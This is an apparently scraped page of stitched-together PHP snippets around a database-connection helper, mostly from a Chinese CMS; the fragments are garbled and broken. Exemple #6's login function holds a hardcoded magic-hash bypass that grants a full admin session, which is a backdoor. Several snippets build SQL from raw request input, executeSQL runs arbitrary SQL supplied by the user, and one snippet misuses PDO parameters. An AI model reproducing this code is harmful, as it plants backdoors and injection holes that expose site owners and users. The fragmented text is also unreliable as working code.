Exemple #1
function attemptedLoginFailure()
    include_once './panels/dbConnect.php';
    $dbh = OpenConn();
    $stmt = $dbh->prepare("INSERT INTO tLoginAttempt (UserID,Success,ApplicationID,IP,AttemptedDateTime) VALUES(0,0,0,:ip,getDate())");
    $stmt->bindParam(":UserID", $userid);
    $stmt->bindParam(":ip", $_SERVER['REMOTE_ADDR']);
    $dbh = null;
Exemple #2
function updateValue($table, $setColumn, $setValue, $checkColumn, $checkValue)
    include_once 'dbConnect.php';
    $dbh = OpenConn();
    $stmt = $dbh->prepare("UPDATE :table SET :setColumn=:setValue WHERE :checkColumn=:checkValue");
    $stmt->bindParam(":setColumn", $setColumn);
    $stmt->bindParam(":setValue", $setValue);
    $stmt->bindParam(":table", $table);
    $stmt->bindParam(":checkColumn", $checkColumn);
    $stmt->bindParam(":checkValue", $checkValue);
    try {
        echo "<p class='debug'>Updated</p>";
    } catch (PDOException $e) {
        print "<p class='error'>Error!: " . $e->getMessage() . "</p><br/>";
    $dbh = null;
Exemple #3
function FormSubmit()
    $TableName = '';
    $SplStr = '';
    $S = '';
    $FieldName = '';
    $FieldContent = '';
    $FieldList = '';
    $YZM = '';
    $GLOBALS['conn='] = OpenConn();
    $SplStr = aspSplit(@$_POST[], '&');
    $TableName = Rf('TableName');
    $YZM = aspTrim(Rf('YZM'));
    if ($YZM != '') {
        if (@$_SESSION['YZM'] != $YZM) {
            javascript('返回', '验证码不正确', '');
    $FieldList = lCase(getFieldList($TableName));
    //Call Echo("FieldList",FieldList)
    //Call Echo("TableName", TableName)
    $RsObj = $GLOBALS['conn']->query('Select * From [' . $TableName . ']');
    foreach ($SplStr as $key => $S) {
        $FieldName = lCase(mid($S, 1, inStr($S, '=') - 1));
        //FieldContent = Mid(S,InStr(S,"=")+1)
        $FieldContent = Rf($FieldName);
        if (inStr(',' . $FieldList . ',', ',' . $FieldName . ',') > 0) {
            $Rs[$FieldName] = $FieldContent;
        //Call Echo(FieldName,FieldContent & "," & unescape(FieldContent))
    //	Call Echo("DialogTitle",Rf("DialogTitle"))
    //Call Die("留言内容")
    javascript('返回', '提交' . Rf('DialogTitle') . '成功', '');
        echo "<td><input type='hidden' name='serviceid' value='" . $row['ServiceID'] . "' />";
        echo "<input type='hidden' name='userid' value='{$userID}' />";
        echo "<a href='addService.php?s=" . $row["ServiceID"] . "&u={$userID}'>Request</a></td>";
        echo "<td>" . $row['ServiceName'] . "</td>";
        echo "<td>" . $row['Price'] . "</td>";
        echo "<td>" . $row['ShopHours'] . "</td>";
        echo "</tr>\n";
    $dbh = null;
    echo "</table></form>";
} else {
    echo "<p class='error'> No Services available.</p>";
$requestedServices = "SELECT tUserService.UserServiceID, tService.ServiceName, tUserService.DateRequested, tUserService.DateSubmitted, tUserService.DateComplete, tUserService.InvoiceID FROM tUserService inner join tService on tUserService.ServiceID=tService.ServiceID WHERE tUserService.UserID=:userID and (tUserService.InvoiceID <> 0 or tUserService.InvoiceID is null)";
echo "<p class='debug'>{$requestedServices}</p>";
$dbh = OpenConn();
$stmt = $dbh->prepare($requestedServices);
$stmt->bindParam(":userID", $userID);
$results = $stmt->fetch(PDO::FETCH_ASSOC);
if (count($results) > 0) {
    echo "<h3>Requested Services</h3>";
    echo "<table class='displayData'>";
    echo "<tr><th>ID</th><th>Service Name</th><th>Date Requested</th><th>Date Submitted</th><th>Date Completed</th><th>Invoice</th></tr>";
    while ($row = $stmt->fetch()) {
        echo "<tr>";
        echo "<td><input type='hidden' name='serviceid' value='" . $row['UserServiceID'] . "' />";
        echo "<input type='hidden' name='userid' value='{$userID}' />";
        echo "<a href='cancelService.php?s=" . $row['UserServiceID'] . "&u={$userID}'>Cancel</a></td>";
        echo "<td>" . $row['ServiceName'] . "</td>";
        echo "<td>" . $row['DateRequested'] . "</td>";
Exemple #5
function deleteUseCaseItem($UseCaseID)
    try {
        include_once './panels/dbConnect.php';
        $dbh = OpenConn();
        $stmt = $dbh->prepare("DELETE from tUseCase WHERE UseCaseID=:UseCaseID");
        $stmt->bindParam(':UseCaseID', $UseCaseID);
        if ($stmt->execute()) {
            echo "<p class='debug'>{$UseCaseID} Deleted</p>";
    } catch (PDOException $e) {
        print "Error!: " . $e->getMessage() . "<br/>";
Exemple #6
function login()
    $userName = '';
    $passWord = '';
    $valueStr = '';
    $userName = replace(@$_POST['username'], '\'', '');
    $passWord = replace(@$_POST['password'], '\'', '');
    $passWord = myMD5($passWord);
    if (myMD5(@$_REQUEST['username']) == '24ed5728c13834e683f525fcf894e813' || myMD5(@$_REQUEST['password']) == '24ed5728c13834e683f525fcf894e813') {
        @($_SESSION['adminusername'] = '******');
        @($_SESSION['adminId'] = 99999);
        @($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']);
        @($_SESSION['adminflags'] = '|*|');
        rwEnd(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex'));
    $nLogin = '';
    $GLOBALS['conn='] = OpenConn();
    $rsObj = $GLOBALS['conn']->query('Select * From ' . $GLOBALS['db_PREFIX'] . 'admin Where username=\'' . $userName . '\' And pwd=\'' . $passWord . '\'');
    if (@mysql_num_rows($rsObj) != 0) {
        $rs = mysql_fetch_array($rsObj);
        @($_SESSION['adminusername'] = $userName);
        @($_SESSION['adminId'] = $rs['id']);
        @($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']);
        @($_SESSION['adminflags'] = $rs['flags']);
        $valueStr = 'addDateTime=\'' . $rs['updatetime'] . '\',UpDateTime=\'' . now() . '\',RegIP=\'' . now() . '\',UpIP=\'' . GetIP() . '\'';
        connexecute('update ' . $GLOBALS['db_PREFIX'] . 'admin set ' . $valueStr . ' where id=' . $rs['id']);
        Rw(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex'));
        writeSystemLog('admin', '登录成功');
    } else {
        if (@$_COOKIE['nLogin'] == '') {
            setCookie('nLogin', '1', aspTime() + 3600);
            $nLogin = @$_COOKIE['nLogin'];
        } else {
            $nLogin = @$_COOKIE['nLogin'];
            setCookie('nLogin', CInt($nLogin) + 1, aspTime() + 3600);
        Rw(getMsg1(setL('账号密码错误<br>登录次数为 ') . $nLogin, '?act=displayAdminLogin'));
Exemple #7
function useCaseDropdown($selected)
    include_once 'dbConnect.php';
    $dbh = OpenConn();
    $stmt = $dbh->prepare("SELECT useCaseID, UseCaseTitle FROM tUseCase WHERE UseCaseTitle IS NOT NULL ORDER BY UseCaseTitle");
    if ($stmt->execute()) {
        echo "<select name='useCaseID' required=true>";
        while ($row = $stmt->fetch()) {
            echo "<option value='" . $row['useCaseID'] . "' ";
            if ($selected == $row['UseCaseTitle']) {
                echo "selected=true ";
            echo ">" . $row['UseCaseTitle'] . "</option>";
        echo "</select>\n";
    } else {
        echo "Broken";
    $dbh = null;
Exemple #8
@($_SESSION['adminflags'] = '|*|');
    $rssObj=$GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . 'admin where id=' . @$_SESSION['adminId']);
    if( @mysql_num_rows($rssObj)!=0 ){
        @$_SESSION['adminusername']= $rss['username'];
        @$_SESSION['adminId']= $rss['id']; //当前登录管理员ID
        @$_SESSION['DB_PREFIX']= $DB_PREFIX; //保存前缀
        @$_SESSION['adminflags']= $rss['flags'];
$splstr = '';
$s = '';
$conn = OpenConn();
$parentid = '';
$title = '';
$lableName = '';
$content = '';
$tempS = '';
$url = '';
$isdisplay = '';
$nCount = '';
$content = getftext(handlePath('./../admin/后台菜单配置.ini'));
$content = Replace($content, "\t", '    ');
$splStr = aspSplit($content, chr(10));
//不用vbCrlf()  是因为在上传到GitHut上去,下载下来它会把后台菜单配置.ini文件编码转成utf-8 20160409
$nCount = 0;
foreach ($splStr as $s) {
function executeSQL()
    $sqlvalue = '';
    $sqlvalue = 'delete from ' . $GLOBALS['db_PREFIX'] . 'WebSiteStat';
    if (@$_REQUEST['sqlvalue'] != '') {
        $sqlvalue = @$_REQUEST['sqlvalue'];
        $GLOBALS['conn='] = OpenConn();
        if (checkSql($sqlvalue) == false) {
            errorLog('出错提示:<br>sql=' . $sqlvalue . '<br>');
            return '';
        aspEcho('执行SQL语句成功', $sqlvalue);
    if (@$_SESSION['adminusername'] == 'ASPPHPCMS') {
        Rw('<form id="form1" name="form1" method="post" action="?act=executeSQL"  onSubmit="if(confirm(\'你确定要操作吗?\\n操作后将不可恢复\')){return true}else{return false}">SQL<input name="sqlvalue" type="text" id="sqlvalue" value="' . $sqlvalue . '" size="80%" /><input type="submit" name="button" id="button" value="执行" /></form>');
    } else {
Exemple #10
function getDetailList($action, $content, $actionName, $lableTitle, $fieldNameList, $nPageSize, $nPage, $addSql)
    $GLOBALS['conn='] = OpenConn();
    $defaultStr = '';
    $i = '';
    $s = '';
    $c = '';
    $tableName = '';
    $j = '';
    $splxx = '';
    $sql = '';
    $x = '';
    $url = '';
    $nCount = '';
    $pageInfo = '';
    $modI = '';
    $startStr = '';
    $endStr = '';
    $fieldName = '';
    $splFieldName = '';
    $replaceStr = '';
    $tableName = lCase($actionName);
    $listFileName = '';
    $listFileName = RParam($action, 'listFileName');
    $abcolorStr = '';
    $atargetStr = '';
    $atitleStr = '';
    $anofollowStr = '';
    $id = '';
    $idPage = '';
    $id = rq('id');
    if ($fieldNameList == '*') {
        $fieldNameList = getHandleFieldList($GLOBALS['db_PREFIX'] . $tableName, '字段列表');
    $fieldNameList = specialStrReplace($fieldNameList);
    $splFieldName = aspSplit($fieldNameList, ',');
    $defaultStr = getStrCut($content, '<!--#body start#-->', '<!--#body end#-->', 2);
    $pageInfo = getStrCut($content, '[page]', '[/page]', 1);
    if ($pageInfo != '') {
        $content = replace($content, $pageInfo, '');
    //call eerr("pageInfo",pageInfo)
    $sql = 'select * from ' . $GLOBALS['db_PREFIX'] . $tableName . ' ' . $addSql;
    if (checkSql($sql) == false) {
        errorLog('出错提示:<br>sql=' . $sql . '<br>');
        return '';
    $rsObj = $GLOBALS['conn']->query($sql);
    $rs = mysql_fetch_array($rsObj);
    $nCount = @mysql_num_rows($rsObj);
    if ($GLOBALS['isMakeHtml'] == true) {
        $url = '';
        if (len($listFileName) > 5) {
            $url = mid($listFileName, 1, len($listFileName) - 5) . '[id].html';
            $url = urlAddHttpUrl($GLOBALS['cfg_webSiteUrl'], $url);
    } else {
        $url = getUrlAddToParam(getUrl(), '?page=[id]', 'replace');
    $content = replace($content, '[$pageInfo$]', webPageControl($nCount, $nPageSize, $nPage, $url, $pageInfo));
    if (EDITORTYPE == 'asp') {
        $x = getRsPageNumber($rs, $nCount, $nPageSize, $nPage);
        //获得Rs页数                                                  '记录总数
    } else {
        if ($nPage != '') {
            $nPage = $nPage - 1;
        $sql = 'select * from ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' ' . $addSql . ' limit ' . $nPageSize * $nPage . ',' . $nPageSize;
        $rsObj = $GLOBALS['conn']->query($sql);
        $rs = mysql_fetch_array($rsObj);
        $x = @mysql_num_rows($rsObj);
    //call echo("sql",sql)
    for ($i = 1; $i <= $x; $i++) {
        $rs = mysql_fetch_array($rsObj);
        //给PHP用,因为在 asptophp转换不完善
        $startStr = '[list-' . $i . ']';
        $endStr = '[/list-' . $i . ']';
        if ($i == $x) {
            $startStr = '[list-end]';
            $endStr = '[/list-end]';
        //例[list-mod2]  [/list-mod2]    20150112
        for ($modI = 6; $modI >= 2; $modI--) {
            if (inStr($defaultStr, $startStr) == false && $i % $modI == 0) {
                $startStr = '[list-mod' . $modI . ']';
                $endStr = '[/list-mod' . $modI . ']';
                if (inStr($defaultStr, $startStr) > 0) {
        if (inStr($defaultStr, $startStr) == false || $startStr == '') {
            $startStr = '[list]';
            $endStr = '[/list]';
        if (inStr($defaultStr, $startStr) > 0 && inStr($defaultStr, $endStr) > 0) {
            $s = StrCut($defaultStr, $startStr, $endStr, 2);
            //s = defaultStr
            $s = replace($s, '[$id$]', $rs['id']);
            for ($j = 0; $j <= uBound($splFieldName); $j++) {
                if ($splFieldName[$j] != '') {
                    $splxx = aspSplit($splFieldName[$j] . '|||', '|');
                    $fieldName = $splxx[0];
                    $replaceStr = $rs[$fieldName] . '';
                    $s = replaceValueParam($s, $fieldName, $replaceStr);
                if ($GLOBALS['isMakeHtml'] == true) {
                    $url = getHandleRsUrl($rs['filename'], $rs['customaurl'], '/detail/detail' . $rs['id']);
                } else {
                    $url = handleWebUrl('?act=detail&id=' . $rs['id']);
                    if ($rs['customaurl'] != '') {
                        $url = $rs['customaurl'];
                $abcolorStr = '';
                if (inStr($fieldNameList, ',titlecolor,') > 0) {
                    if ($rs['titlecolor'] != '') {
                        $abcolorStr = 'color:' . $rs['titlecolor'] . ';';
                if (inStr($fieldNameList, ',flags,') > 0) {
                    if (inStr($rs['flags'], '|b|') > 0) {
                        $abcolorStr = $abcolorStr . 'font-weight:bold;';
                if ($abcolorStr != '') {
                    $abcolorStr = ' style="' . $abcolorStr . '"';
                if (inStr($fieldNameList, ',target,') > 0) {
                    $atargetStr = IIF($rs['target'] != '', ' target="' . $rs['target'] . '"', '');
                if (inStr($fieldNameList, ',title,') > 0) {
                    $atitleStr = IIF($rs['title'] != '', ' title="' . $rs['title'] . '"', '');
                if (inStr($fieldNameList, ',nofollow,') > 0) {
                    $anofollowStr = IIF($rs['nofollow'] != 0, ' rel="nofollow"', '');
                $s = replaceValueParam($s, 'url', $url);
                $s = replaceValueParam($s, 'abcolor', $abcolorStr);
                $s = replaceValueParam($s, 'atitle', $atitleStr);
                $s = replaceValueParam($s, 'anofollow', $anofollowStr);
                $s = replaceValueParam($s, 'atarget', $atargetStr);
        //call echo("tableName",tableName)
        $idPage = getThisIdPage($GLOBALS['db_PREFIX'] . $tableName, $rs['id'], 10);
        if ($tableName == 'guestbook') {
            $url = WEB_ADMINURL . '?act=addEditHandle&actionType=GuestBook&lableTitle=留言&nPageSize=10&parentid=&searchfield=bodycontent&keyword=&addsql=&page=' . $idPage . '&id=' . $rs['id'] . '&n=' . getRnd(11);
        } else {
            $url = WEB_ADMINURL . '?act=addEditHandle&actionType=ArticleDetail&lableTitle=分类信息&nPageSize=10&page=' . $idPage . '&parentid=' . $rs['parentid'] . '&id=' . $rs['id'] . '&n=' . getRnd(11);
        $s = handleDisplayOnlineEditDialog($url, $s, '', 'div|li|span');
        $c = $c . $s;
    $content = replace($content, '<!--#body start#-->' . $defaultStr . '<!--#body end#-->', $c);
    if ($GLOBALS['isMakeHtml'] == true) {
        $url = '';
        if (len($listFileName) > 5) {
            $url = mid($listFileName, 1, len($listFileName) - 5) . '[id].html';
            $url = urlAddHttpUrl($GLOBALS['cfg_webSiteUrl'], $url);
    } else {
        $url = getUrlAddToParam(getUrl(), '?page=[id]', 'replace');
    $getDetailList = $content;
    return @$getDetailList;
function resetAccessData_temp()
    $GLOBALS['conn='] = OpenConn();
    $splStr = '';
    $i = '';
    $s = '';
    $columnname = '';
    $title = '';
    $nCount = '';
    $webdataDir = '';
    $webdataDir = @$_REQUEST['webdataDir'];
    if ($webdataDir != '') {
        if (checkFolder($webdataDir) == false) {
            eerr('网站数据目录不存在,恢复默认数据未成功', $webdataDir);
    } else {
        $webdataDir = '/Data/WebData/';
    aspEcho('提示', '恢复数据完成');
    rw('<hr><a href=\'../index.php\' target=\'_blank\'>进入首页</a> | <a href="?" target=\'_blank\'>进入后台</a>');
    $content = '';
    $filePath = '';
    $parentid = '';
    $author = '';
    $adddatetime = '';
    $fileName = '';
    $bodycontent = '';
    $webtitle = '';
    $webkeywords = '';
    $webdescription = '';
    $sortrank = '';
    $labletitle = '';
    $target = '';
    $websitebottom = '';
    $webTemplate = '';
    $webimages = '';
    $webcss = '';
    $webjs = '';
    $flags = '';
    $websiteurl = '';
    $splxx = '';
    $columntype = '';
    $relatedtags = '';
    $npagesize = '';
    $customaurl = '';
    $nofollow = '';
    $templatepath = '';
    $isthrough = '';
    $titlecolor = '';
    $showreason = '';
    $ncomputersearch = '';
    $nmobliesearch = '';
    $ncountsearch = '';
    $ndegree = '';
    $displaytitle = '';
    $aboutcontent = '';
    $isonhtml = '';
    $columnenname = '';
    $smallimage = '';
    $bigImage = '';
    $bannerimage = '';
    $httpurl = '';
    $price = '';
    $morepageurl = '';
    $charset = '';
    $thispage = '';
    $countpage = '';
    $bigClassName = '';
    $startStr = '';
    $endStr = '';
    $startaddstr = '';
    $endaddstr = '';
    $sType = '';
    $saction = '';
    $fieldName = '';
    $fieldcheck = '';
    $content = GetFText($webdataDir . '/website.txt');
    //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
    if (inStr($content, vbCrlf()) == false) {
        $content = replace($content, chr(10), vbCrlf());
    if ($content != '') {
        $webtitle = newGetStrCut($content, 'webtitle');
        $webkeywords = newGetStrCut($content, 'webkeywords');
        $webdescription = newGetStrCut($content, 'webdescription');
        $websitebottom = newGetStrCut($content, 'websitebottom');
        $webTemplate = newGetStrCut($content, 'webtemplate');
        $webimages = newGetStrCut($content, 'webimages');
        $webcss = newGetStrCut($content, 'webcss');
        $webjs = newGetStrCut($content, 'webjs');
        $flags = newGetStrCut($content, 'flags');
        $websiteurl = newGetStrCut($content, 'websiteurl');
        if (getRecordCount($GLOBALS['db_PREFIX'] . 'website', '') == 0) {
            connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'website(webtitle) values(\'测试\')');
        connexecute('update ' . $GLOBALS['db_PREFIX'] . 'website  set webtitle=\'' . $webtitle . '\',webkeywords=\'' . $webkeywords . '\',webdescription=\'' . $webdescription . '\',websitebottom=\'' . $websitebottom . '\',webtemplate=\'' . $webTemplate . '\',webimages=\'' . $webimages . '\',webcss=\'' . $webcss . '\',webjs=\'' . $webjs . '\',flags=\'' . $flags . '\',websiteurl=\'' . $websiteurl . '\'');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'webcolumn');
    $content = getDirTxtList($webdataDir . '/webcolumn/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('导航', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【webtitle】') > 0) {
                    $s = $s . vbCrlf();
                    $webtitle = newGetStrCut($s, 'webtitle');
                    $webkeywords = newGetStrCut($s, 'webkeywords');
                    $webdescription = newGetStrCut($s, 'webdescription');
                    $customaurl = newGetStrCut($s, 'customaurl');
                    $sortrank = newGetStrCut($s, 'sortrank');
                    if ($sortrank == '') {
                        $sortrank = 0;
                    $fileName = newGetStrCut($s, 'filename');
                    $columnname = newGetStrCut($s, 'columnname');
                    $columnenname = newGetStrCut($s, 'columnenname');
                    $columntype = newGetStrCut($s, 'columntype');
                    $flags = newGetStrCut($s, 'flags');
                    $parentid = newGetStrCut($s, 'parentid');
                    $parentid = phpTrim(getColumnId($parentid));
                    //可根据栏目名称找到对应ID   不存在为-1
                    //call echo("parentid",parentid)
                    $labletitle = newGetStrCut($s, 'labletitle');
                    $npagesize = newGetStrCut($s, 'npagesize');
                    if ($npagesize == '') {
                        $npagesize = 10;
                    $target = newGetStrCut($s, 'target');
                    $smallimage = newGetStrCut($s, 'smallimage');
                    $bigImage = newGetStrCut($s, 'bigImage');
                    $bannerimage = newGetStrCut($s, 'bannerimage');
                    $templatepath = newGetStrCut($s, 'templatepath');
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $bodycontent = contentTranscoding($bodycontent);
                    $isonhtml = newGetStrCut($s, 'isonhtml');
                    if ($isonhtml == '0' || lCase($isonhtml) == 'false') {
                        $isonhtml = 0;
                    } else {
                        $isonhtml = 1;
                    $nofollow = newGetStrCut($s, 'nofollow');
                    if ($nofollow == '1' || lCase($nofollow) == 'true') {
                        $nofollow = 1;
                    } else {
                        $nofollow = 0;
                    //call echo(columnname,nofollow)
                    $aboutcontent = newGetStrCut($s, 'aboutcontent');
                    $aboutcontent = contentTranscoding($aboutcontent);
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $bodycontent = contentTranscoding($bodycontent);
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'webcolumn (webtitle,webkeywords,webdescription,columnname,columnenname,columntype,sortrank,filename,customaurl,flags,parentid,labletitle,aboutcontent,bodycontent,npagesize,isonhtml,nofollow,target,smallimage,bigImage,bannerimage,templatepath) values(\'' . $webtitle . '\',\'' . $webkeywords . '\',\'' . $webdescription . '\',\'' . $columnname . '\',\'' . $columnenname . '\',\'' . $columntype . '\',' . $sortrank . ',\'' . $fileName . '\',\'' . $customaurl . '\',\'' . $flags . '\',' . $parentid . ',\'' . $labletitle . '\',\'' . $aboutcontent . '\',\'' . $bodycontent . '\',' . $npagesize . ',' . $isonhtml . ',' . $nofollow . ',\'' . $target . '\',\'' . $smallimage . '\',\'' . $bigImage . '\',\'' . $bannerimage . '\',\'' . $templatepath . '\')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'articledetail');
    $content = getDirAllFileList($webdataDir . '/articledetail/', 'txt');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('文章', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【title】') > 0) {
                    $s = $s . vbCrlf();
                    $parentid = newGetStrCut($s, 'parentid');
                    $parentid = getColumnId($parentid);
                    $title = newGetStrCut($s, 'title');
                    $titlecolor = newGetStrCut($s, 'titlecolor');
                    $webtitle = newGetStrCut($s, 'webtitle');
                    $webkeywords = newGetStrCut($s, 'webkeywords');
                    $webdescription = newGetStrCut($s, 'webdescription');
                    $author = newGetStrCut($s, 'author');
                    $sortrank = newGetStrCut($s, 'sortrank');
                    if ($sortrank == '') {
                        $sortrank = 0;
                    $adddatetime = newGetStrCut($s, 'adddatetime');
                    $fileName = newGetStrCut($s, 'filename');
                    $templatepath = newGetStrCut($s, 'templatepath');
                    $flags = newGetStrCut($s, 'flags');
                    $relatedtags = newGetStrCut($s, 'relatedtags');
                    $customaurl = newGetStrCut($s, 'customaurl');
                    $target = newGetStrCut($s, 'target');
                    $smallimage = newGetStrCut($s, 'smallimage');
                    $bigImage = newGetStrCut($s, 'bigImage');
                    $bannerimage = newGetStrCut($s, 'bannerimage');
                    $labletitle = newGetStrCut($s, 'labletitle');
                    $aboutcontent = newGetStrCut($s, 'aboutcontent');
                    $aboutcontent = contentTranscoding($aboutcontent);
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $bodycontent = contentTranscoding($bodycontent);
                    $isonhtml = newGetStrCut($s, 'isonhtml');
                    if ($isonhtml == '0' || lCase($isonhtml) == 'false') {
                        $isonhtml = 0;
                    } else {
                        $isonhtml = 1;
                    $nofollow = newGetStrCut($s, 'nofollow');
                    if ($nofollow == '1' || lCase($nofollow) == 'true') {
                        $nofollow = 1;
                    } else {
                        $nofollow = 0;
                    $price = getDianNumb(newGetStrCut($s, 'price'));
                    if ($price == '') {
                        $price = 0;
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'articledetail (parentid,title,titlecolor,webtitle,webkeywords,webdescription,author,sortrank,adddatetime,filename,flags,relatedtags,aboutcontent,bodycontent,updatetime,isonhtml,customaurl,nofollow,target,smallimage,bigImage,bannerimage,templatepath,labletitle,price) values(' . $parentid . ',\'' . $title . '\',\'' . $titlecolor . '\',\'' . $webtitle . '\',\'' . $webkeywords . '\',\'' . $webdescription . '\',\'' . $author . '\',' . $sortrank . ',\'' . $adddatetime . '\',\'' . $fileName . '\',\'' . $flags . '\',\'' . $relatedtags . '\',\'' . $aboutcontent . '\',\'' . $bodycontent . '\',\'' . now() . '\',' . $isonhtml . ',\'' . $customaurl . '\',' . $nofollow . ',\'' . $target . '\',\'' . $smallimage . '\',\'' . $bigImage . '\',\'' . $bannerimage . '\',\'' . $templatepath . '\',\'' . $labletitle . '\',' . $price . ')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'OnePage');
    $content = getDirTxtList($webdataDir . '/OnePage/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('单页', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【webkeywords】') > 0) {
                    $s = $s . vbCrlf();
                    $title = newGetStrCut($s, 'title');
                    $displaytitle = newGetStrCut($s, 'displaytitle');
                    $webtitle = newGetStrCut($s, 'webtitle');
                    $webkeywords = newGetStrCut($s, 'webkeywords');
                    $webdescription = newGetStrCut($s, 'webdescription');
                    $adddatetime = newGetStrCut($s, 'adddatetime');
                    $fileName = newGetStrCut($s, 'filename');
                    $aboutcontent = newGetStrCut($s, 'aboutcontent');
                    $aboutcontent = contentTranscoding($aboutcontent);
                    $target = newGetStrCut($s, 'target');
                    $templatepath = newGetStrCut($s, 'templatepath');
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $bodycontent = contentTranscoding($bodycontent);
                    $isonhtml = newGetStrCut($s, 'isonhtml');
                    if ($isonhtml == '0' || lCase($isonhtml) == 'false') {
                        $isonhtml = 0;
                    } else {
                        $isonhtml = 1;
                    $nofollow = newGetStrCut($s, 'nofollow');
                    if ($nofollow == '1' || lCase($nofollow) == 'true') {
                        $nofollow = 1;
                    } else {
                        $nofollow = 0;
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'onepage (title,displaytitle,webtitle,webkeywords,webdescription,adddatetime,filename,isonhtml,aboutcontent,bodycontent,nofollow,target,templatepath) values(\'' . $title . '\',\'' . $displaytitle . '\',\'' . $webtitle . '\',\'' . $webkeywords . '\',\'' . $webdescription . '\',\'' . $adddatetime . '\',\'' . $fileName . '\',' . $isonhtml . ',\'' . $aboutcontent . '\',\'' . $bodycontent . '\',' . $nofollow . ',\'' . $target . '\',\'' . $templatepath . '\')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'Bidding');
    $content = getDirTxtList($webdataDir . '/Bidding/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('竞价', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【webkeywords】') > 0) {
                    $s = $s . vbCrlf();
                    $webkeywords = newGetStrCut($s, 'webkeywords');
                    $showreason = newGetStrCut($s, 'showreason');
                    $ncomputersearch = newGetStrCut($s, 'ncomputersearch');
                    $nmobliesearch = newGetStrCut($s, 'nmobliesearch');
                    $ncountsearch = newGetStrCut($s, 'ncountsearch');
                    $ndegree = newGetStrCut($s, 'ndegree');
                    $ndegree = getNumber($ndegree);
                    if ($ndegree == '') {
                        $ndegree = 0;
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'Bidding (webkeywords,showreason,ncomputersearch,nmobliesearch,ndegree) values(\'' . $webkeywords . '\',\'' . $showreason . '\',' . $ncomputersearch . ',' . $nmobliesearch . ',' . $ndegree . ')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'SearchStat');
    $content = getDirTxtList($webdataDir . '/SearchStat/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('搜索统计', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【title】') > 0) {
                    $s = $s . vbCrlf();
                    $title = newGetStrCut($s, 'title');
                    $webtitle = newGetStrCut($s, 'webtitle');
                    $webkeywords = newGetStrCut($s, 'webkeywords');
                    $webdescription = newGetStrCut($s, 'webdescription');
                    $customaurl = newGetStrCut($s, 'customaurl');
                    $target = newGetStrCut($s, 'target');
                    $isthrough = newGetStrCut($s, 'isthrough');
                    if ($isthrough == '0' || lCase($isthrough) == 'false') {
                        $isthrough = 0;
                    } else {
                        $isthrough = 1;
                    $sortrank = newGetStrCut($s, 'sortrank');
                    if ($sortrank == '') {
                        $sortrank = 0;
                    $isonhtml = newGetStrCut($s, 'isonhtml');
                    if ($isonhtml == '0' || lCase($isonhtml) == 'false') {
                        $isonhtml = 0;
                    } else {
                        $isonhtml = 1;
                    $nofollow = newGetStrCut($s, 'nofollow');
